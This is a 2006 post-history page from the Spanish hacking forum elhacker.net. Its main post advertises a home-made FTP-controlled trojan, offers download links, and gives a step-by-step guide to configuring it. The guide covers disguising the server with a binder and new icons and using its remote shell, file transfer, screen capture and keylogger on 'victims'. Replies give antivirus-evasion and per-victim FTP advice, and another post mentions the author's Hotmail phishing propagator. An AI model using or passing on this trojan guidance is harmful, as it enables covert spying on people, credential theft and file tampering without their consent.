elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Inicio Ayuda Ingresar Registrarse
18 Noviembre 2008, 14:27  

Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17 18 19 20 21 22 23 24 25
211  Seguridad Informática / Análisis y Diseño de Malware / Re: TROY LixKeÜ 1.0.0 en: 14 Junio 2006, 00:28
 es un troyano común solo que la interfas lo hace por ftp y creo que hay muchas formas uan de eserlo indetectable  ;D ;D no esperen tambien que las enseñe, por que eso ya depende de cada uno ;D
 El del uso del cpu no me doy cuenta por que mi pc es una P4-3.0Ghz con una menoria de 512, ademas tiene una placa de vide de 256 MB, vel de internet 2MHz, sera por eso que no lo note ;D ;D ;D ;D ;D
 Con respecto que no entendisto ese del binder lo que te recomiendes es que solo utilizes la funcion editar y editas el server y el cliente. si no sabes usar las demas funciones no lo uses y listo
212  Seguridad Informática / Análisis y Diseño de Malware / Re: TROY LixKeÜ 1.0.0 en: 13 Junio 2006, 00:41
  gracias  a todos  ;D 

Con el tema de que los antivirus lo detectan creo que es por el problema de la descarga de ficheros, pero pienso que son poco los antivirus que lo detectan. Lo bueno de esto es que podes llevar donde quieras tu cliente, ya sea en un ciber cafe,en la casa de un amigo y tendras conexion siempre.
  Una de las cosas que me olbide decir es que tengan una cuenta ftp diferente para cada tipo de victimas. No usen siempre el mismo ftp, por que se saturara.  ;D ;D

213  Seguridad Informática / Análisis y Diseño de Malware / TROY LixKeÜ 1.0.0 en: 12 Junio 2006, 17:41
Holas a todos bueno hoy les presento a un troyano muy particular se llama TROY LixKeÜ 1.0.0  Bueno que tiene de particular este troyano, es que no necesita saber la ip de la victima ni tampoco le interesa que tipo de conexion tiene ya que es 100% funcional.  ¿Como hace esto? Es simple  ;D lo que hace es conectar tanto al cliente como al server a un servidor ftp.
  Bueno entonces podemos decir que este troyano es del tipo via ftp  ;D ;D :-*
  Otra de las ventajas que tiene es que si no se encuentra conectada la victima usted podra enviar igual las funciones y al momento de conectarce la victima el server realizara lo pedido.

<<<<<<<<<DESCARGAR:>>>>>>>>>>Tamaño 4,62 MB (4.844.584 bytes)>>>>tipo RAR<<<<<
 http://beto123456789.webcindario.com/INDETECTABLE.rar

:http://rapidshare.de/files/23534738/INDETECTABLE.rar.html

Lo que necesitamos para este troyano es:
 * Primero un servidor ftp ( Les recomiendo Lycos.es porque es el que yo utilizo ::))
 * Segundo usuario y contraseña
 * Tercero el dominio web

Esto esplicare mas detallado un poco mas adelante por ahora solo intenten conseguir una cuenta y un espacio en Lycos

Una vez conseguido surcribirse tendran que conseguir un espacio web en donde te daran una cuenta ftp (QUE ES LO QUE NOS INTERESA) y un dominio. Estos datos te lo enviaran a tu correo y listo es todo ;D.

Los archivos que cuenta este troyano son:

Como ven los archivos mas inportante son:
*Desintalador
*Editor
*Cliente
*Server

Comenzamos con editar sus datos de conexion para ello abrimos el Editor y bamos colo cando los datos que nos piden. En la para donde nos pide dominio web o direccion web ponemos la nuesta que usualmente es  http://usuarios.lycos.es/betoBEN/ en mi caso es >>"betoBEN">> pero en el suyo sera su nombre de usuario de su cuenta. Otra de las cosas es que no se olvisen de poner http:\\ ni menos de olbidarse poner >> \ << al final por que osino el server ni el cliente podran leer los comandos enviados.
  Puesto sus datos presionen editar y busquen al cliente y pongan en abrir para editarlo y luego sin cambiar buelban a presionar y editen el server.
 Aqui les pongo una imagen para que se guien mejor ;D ;D:

ALLi ya tienen todo listo para que funcione pero el editor tambien trae otras obciones como la de cambiar el icono la cual aqui me tienen que prestar mucha pero mucha atencion osino no le ba a funcionar su server. Por que le digo esto ya lo esplico: esto se debe a que si nosotro editamos primero los datos estos datos se escribiran al final del archivo (la contraseña se escribe inscriptada)  y el archivo se al executarse se encarga de leer estos datos para conectarse. Ustedes se preguntaran ¿¿¿y que tiene que ver esto con lo de cambiar el icono :-\??? >>>YO LE CONTESTO>>> Tiene que ver devido a que cuando cambiamos el icono del server o del archivo juntad del brinder el icono y susu datos en binario tambien se escriben al final del archivo. Y que pasa entonces al momento de leer sus datos el server no lo leera sino que leera lo del icono y logrando asi no conectarse. :-(

;)>>SOLUCION AL PROBLEMA>>:  Cambiar primero el icono del server (y del archivo juntad)ANTES DE EDITAR LOS DATOS  DEL SERVER Y DE BRINDEAR UN ARCHIVO.
   Con respecto a la parte del soft es fasil eligen primero la aplicasion luego el icono el cual puse muchos una carpeta llamada xxxxICONOsxxx y por ultimo le dan en cambiar icono.

***Otra de las cosas que trae es un binder que en este caso es el ASTAROTH que fue echo por Kizar y otros mas,>> bueno ustedes lo conoseran :rolleyes:
  Este joiner tiene un archivo que se llama JUNTAD  el cual es el encargadode guardar los archivos cargados es por esto que si quieren cambiar de icono a su archivo juntado primerodeberan cambiar el icono del JUNTAD.
  COMO CONSEJO:>> Primero cambien el ino del server y y del Juntad y luego resin dediquense a hacer todo lo otro es por esto que PUSE PRIMERO al cambiador de icono en el EDITOR.

>>>>> EL MOMENTO ESPERADO SU MANEJO:<<<<<<<<<
  Antes que nada quiero aclarar que es su primera version y no traee muchas funciones solo trae las mas basicas y algunas cosas no estan muy bien pero en versiones posteriores se ira supermejorando y agregando mas funciones. ;D ;D ;D ;D
 Puse tambien un desintalador por el cual podran probaren su propia compu y poder desintalarla luego de probarla.

Comenzamos:
  Si hacemos doble clip sobre el fondo podemos ver nuestros datos de conexion y asi comprobar que todo este en orden ;D

*La primera funcion es Estado de conexion: Aqui podremos ver si esta o no conectado la victima, bueno como lo hace :-\??' lo que hace para saber es por medio de un mensaje que envia el server diciendo que esta conectado pero ojo ;) este mensaje el server lo envia una sola vez asi que para comprobar verdaderamente la conexion tendremos que presionar el boton RESET para que el cliente figure que esta desconectado y luego le damos en el boton ""funcion"" (pero siempre con el nombre online)  para desirle  o preguntarle al server si esta o no conectado si este esta conectado de inmediato luego del aviso te aparecera ESTOY CONECTADO , de lo contrario quedara como lo dejo el boton reset. Otra cosa inportante aclararles es que cuando se cierra el CLIENTE ESTE ENVIA UN MENSAJE AL FTP DICIENDO QUE EL SERVER ESTA DESCONECTADO es por ello que necesitamos presinar el boton funcion para comprobarlo de verdad.
 En resumen presionen reset y luego en funcion y alli veran en forma eficaz la conexion ;D ;D ;D :D

*La segunda opcion es la de shell remota en donde ustedes lo que tengran que hacer es escribir un comando y darle al boton envia, esperar que el comando se haya enviado correctamente y luego los datos apareceran en la caja de texto de abajo.
  Para alguien que sabe programar en bat me sabra entender mejo y sabaran utilizarlo.

AQUI LES PONGO ALGUNOS COMANDOS BASICOS ya que con la shell remota se puede hacer practicamente de todo ;D ;D ;D :D

***************Ver los directorio y manejo de archivos archivos********

dir c:\
del  c:\compi.txt q(la "q" elimina en forma cilenciosa) >>>>>Elimina los archivos espesificos
move [/y | /-y] [origen] [destino]>>>< mover archivos
openfiles.exe /disconnect >>>>> desconectar archivo de la red
rename [Unidad:][rutaDeAcceso] nombreDeArchivo1 nombreDeArchivo2>>>cambiar nombre
xcopy Origen [Destino]

****************Apagado y reinicio del equipo**************************

shutdown [{-l|-s|-r|-a}] [-f] [-m [\\nombreEquipo]] [-t xx] [-c "mensaje"] [-d[p]:xx:yy]
shutdows -l >>> cierra la sesion del usuario
shutdows -s >>>> Apaga el equipo
shutdows -r >>> Reinicia
shutdows -a >>>>Enuncia el apagado
shutdows -f >>>>Obliga a las aplicasiones a cerrarse
shutdows -m [\\nombreDeEquipo]  >>>Espesifica el quipo que desea apagar
shutdows -c "mensaje" >>> mensaje del apagado

**************abrir programas******************************************

start ["título"] [/drutaDeAcceso] [/i]
start c:\archivo.txt >>>>>ejemplo de como abrir todos los archivos

****************OTRAR FORMA******************************

mplay32 >>>>reproductor de windows
mshearts>>>>Corazones en internet
mstsc>>>>>escritorio remoto
osk>>>>>teclado en pantalla
regedit>>>>registro
scrnsave>>>>pantalla negra
sndrec32>>>>grabador de voz
sndvol32>>>>control de volumen
sol>>>>>solitario
spider>>>solitario spider
ss3dfo>>>cubre pantalla windows
ssbezier>>>>cubre pantalla
ssmarque>>>>cubre pantalla
ssmypics>>>cubre pantalla de sus imagenes
syskey>>><Uno que les recomiendo
tourstart>>>>paseo por xp
write>>>wor pad
wupdmgr>>>internet explore

**************mas comandos*********************************************

rmdir >>>>>>La nueva opción de línea de comandos /s elimina los directorios que contienen archivos y subdirectorios.
net use>>>>Usuarios en conexion
netstat>>> Conexiones establecidas
nbtstat<>> Recursos compartidos
net send (PC REMOTA) (MENSAJE) >>>Envia mensajes por la red lan
date (t nuevo tiempo)>>>>fecha del sistema
ftp>>>>>trensferencia de archivos
hostname>>>>nombre del usuario
%TIME%>>>>>hora
%WINDIR%>>>>directorio de windows
%USERPROFILE%
%USERNAME%>>>>Usuario que inicio sesion
label>>>>crea o elimina la etiqueta del disco c:\
Taskkill >>>>> Finaliza una o más tareas o procesos

* Tambien tenemos la transferencia de archivos: Aqui lo que tenemos que hacer es para: DESCARGAR UN ARCHIVO es fasil lo unico que tenemos que hacer es presionar el boton descargar archivo y nos aparecera otra ventana pidiendonos la direccion del archivo remoto ( Para ver los direcctorios utilaza la shell y el comando DIR) y una vez echo esto esperate un tiempo por que no hay barras de progreso para avisarte que el server ya subio el archivo.
   Y por ultimo copias esa direccion el tu navegador y te lo descargas ( Atencion estosolo funciona en un navegador FIREFOX)
   O intenta con el boton que dice descarga pero funcional es el metodo de arriba.
SUBIDA DE ARCHIVOS: este es mas fasil, buscamos el archivo que queremos subir y luego el server lo descarga en la unidad C:\ (de alli lugo lo podes cortar y pegar en otra parte o donde quieras con la shell remota).

Nota: los archivos subidos tanto por el cliente como por el server tendran que ser borrados en forma manual, es por eso que les puse con los archivos que componen al troy el Smart FTP para instalarlo. De de alli elimina los archivos subidos y no gastar tanto espacio. En versiones posteriores agregare ete tipo de soft al cliente de TROY para no complicarlo tanto.

* Una de las funciones que mas me gusta es esta: la CAPTURA DE PANTALLA
   Lo que tenemos que hacer es presionar el boton que dicecapturar pantalla esperara que se haya enviado bien la funcion y despues presionar el borton que dice VER LA PANTALLA.
   Creo que es muy fasil y si no se llega a ver bien toda la pantalla cerrala y volve  apresionar nuevamente el boton de ver pantalla.

* Keylogger: Esta me sera deficil explicar ;D ;D ;D lo que tenemos que hacer una vez conectada la victima es presionar el boton capturar teclas pero aqui viene lo malo, usted no podra ver las teclas pulsadas en forma ofline sino que tendra que esperar que la victima reinicie la compu y buelva a ejecutar de nuevo el server y de alli resien presionar el boton VER TECLAS.
  Como resumen: usted con la funcion keylogger lo unico que hace es activar un keylloger que anotara todo lo pulsado hasta que la pc de la victima se apague ( lo hice asi por que si el keylogger se encargara de anotar lo pulsado y de enviarlo gastaria demasiado ancho de banda que su victima no podra ni ver una pagina es por eso que me decidi a hacerlo así)
 y para ver lo pulsado en todo ese momento que usted lo activo y la pc reinicio presiona  ver teclas.

NOTA: en el caso del boton ver teclas es asi porque si nosotros, por ejemplo  presionariamos luego de un tiempo de aver presionado el boton de capturar teclas el voton ver teclas no funcionaria por que el server no podra subirlo al ftp ya que el log que esta anotando las teclas se esta sobreescribiendo cada 1 minuto y de este modo seria imposible subirlo.Por ese motibo es que hay que esperar que el server se inicie nuevamente y no activado el key poderlo subir.

Es un poco trambolico, pero lo sabran utilizar.;D ;D ;D :D

*ABIRLE EL PAINT: Le puse con ese nombre no crean que esta mal escrito ;D ;D ;D  esta funcion es mas fasil que prender la tele lo unico que hace es abrir el paint en la pc victima.Lo agregue como funcion mas por que fue la prmera que utilize para comprobar que el troyano funcionace es por eso que es importante para mi y la puse.

Bueno espero que les guste y le saken provecho creo que es indetectable, le falta agregar mas funciones pero tampoco esperen de mucho, ya que es su primera version.Me comprometo a decir que en versiones posteriores se mejoraran las funciones y se solucionararan algunos inconveniente que por alli tiene.
                                                    LixKeÜsoft Corporatión
214  Seguridad Informática / Análisis y Diseño de Malware / Re: usar troyano en red router en: 08 Junio 2006, 17:28
  Thor eres moderador me alegro por tiamigo espero que agas de esto algo bueno te felicito  ;D ;D ;D ;D
215  Seguridad Informática / Análisis y Diseño de Malware / Re: Troyanos: Clientes sin servers... en: 08 Junio 2006, 17:16
  este tipo tiene problemas de conexion ;D ;D
216  Seguridad Informática / Análisis y Diseño de Malware / Re: Troyanos: Clientes sin servers... en: 07 Junio 2006, 16:52
 espertate que ya viene uno muy bueno.

Te lo digo de verdad  ;D ;D ;D ;D ;D

217  Seguridad Informática / Análisis y Diseño de Malware / Re: Se puede convertir Un .Exe En .TXT (.DOC) Y te Funcione en Troyanos en: 28 Abril 2006, 18:41
  eso ya es mas viejo que nunca y no funca en WIND Xp ademas el word te da avisos  ;D ;D asi que ..................
218  Seguridad Informática / Análisis y Diseño de Malware / Re: Nace Remote Control Studio en: 28 Abril 2006, 18:27
  Me parece muy guapa la web pero me gusta que puedan opinar los demas y asi hacer programas cada vez mas buenos y funcionales espero que tu web siga cresiendo y abiendo mas programas que sean utiles para todos y suerte con esto ;D
219  Seguridad Informática / Análisis y Diseño de Malware / Re: Sobre el tema de las cuotas de 60!! en: 21 Abril 2006, 00:03
  La verdad que si es un trabajo un poco pesado y estar aqui conectado 4-7 veces por dia Si que es deficil y yo como usuario mas de este foro quiero dar las gracias MITM por el trabajo que ase dia a dia.
  En verdad todos tendriamos que agradeserle. ;D ;D ;D ;D ;D ;D ;D
220  Seguridad Informática / Análisis y Diseño de Malware / Re: Conectar 2 aplicaciones mediante NO-IP en: 20 Abril 2006, 03:28
  intenta abrir los puertos del route del servidor o usa otro metodo ;D
221  Seguridad Informática / Análisis y Diseño de Malware / Re: Torneo Virus War !!! en: 20 Abril 2006, 03:19
  no es de mucha idea lo que digo pero se permitiria que un mismo ejecutable llevara con sigo algun av 
222  Seguridad Informática / Análisis y Diseño de Malware / Re: Fake - Propagador LixKeÜ en: 04 Abril 2006, 23:02
  E tomado una desicion con respecto al fake que e creado y llegue ala conclusion de que no se por que, pero esto ESTA MAL ya que yo como unos amigos vimos sus resultatos y son realmente creibles ya que su propagasion es 100%, creo que esto se a combertido en una verdadera amenaza a los usuarios de hotmail.
  Por estos motivos y otras cosas mas e tomado la desiscion DE PEDIR A LOS SEÑORES MODERADORES que saquen,ELIMINEN este
Post  y que mas personas usen esta herramienta que es NATO DE ESTE FORO.

Sin mas que pedir LixKeÜ ;D

PD: gracias RED_HORSE por darme a entender
223  Seguridad Informática / Análisis y Diseño de Malware / Re: Abril Negro Fake by hIgOcHuMbO en: 04 Abril 2006, 22:42
  Bueno e leido el manual de Kizar de ablil negro y e visto una breve confusion entre lo que es exploit y lo que es Xploits

Y miarando por alli encontre alguien que esplico la diferencia de ambos ;D ;D ;Dhttp://foro.SPAM(1)/index.php/topic,25337.0.html

Vamos a ver las definiciones de estos dos terminos que se confunden muy seguido ya que su pronunciacion y escritura son similares.
 Primero planteo este tema para que dejen de preguntar e insistir con los exploit q en fin lo llaman como al fake mail.
-----------------------!!!!!!!!!!--------------------------------
                             EXPLOIT
 Exploit (viene de to exploit - aprovechar) - código escrito con el fin de aprovechar un error de programación para obtener diversos privilegios. software.

Un buen número de exploits tienen su origen en un conjunto de fallos similares. Algunos de los grupos de vulnerabilidades más conocidos son:

Vulnerabilidades de desbordamiento de pila o buffer overflow.
Vulnerabilidades de condición de carrera (Race condition).
Vulnerabilidades de error de formato de cadena (format string bugs).
Vulnerabilidades de Cross Site Scripting (XSS).
Vulnerabilidades de inyección SQL (SQL injection).
Vulnerabilidades de inyeccion de caraceres (CRLF).
Obtenido de "http://es.wikipedia.org/wiki/Exploit"
-------------------------!!!!!!!!!!----------------------------
                               XPLOIT
Fake mail o mas comunmente llamado xploit. Enviar correo electrónico falseando el remitente. Se trata de una técnica muy empleada en Ingeniería Social.
 Como modo de obtener contraseñas de hotmail,yahoo o cualquier tipo de compania para los correos electronicos. Esta tecnica es considerada lammer para la comunidad de hackers o para quienes se interesan verdaderamente en el tema del hacking.

Fuente:http://www.tulocura.net/definiciones.php y parte de http://es.wikipedia.org/wiki/Exploit

Nos vemos....
224  Seguridad Informática / Análisis y Diseño de Malware / Re: Fake - Propagador LixKeÜ en: 03 Abril 2006, 23:31
  EEEEEEE RED_HORSE  amigo te desidiste al fin en entrar a este foro. Pasame a buscar mañana....ya sabes
225  Programación / Programación VB / Re: Servidor FTP y HTTP en: 02 Abril 2006, 23:47
   Mandame un privado y veo como te paso aplicasiones de estas ;D ;D ;D ;D ;D
Páginas: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 [15] 16 17 18 19 20 21 22 23 24 25

Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.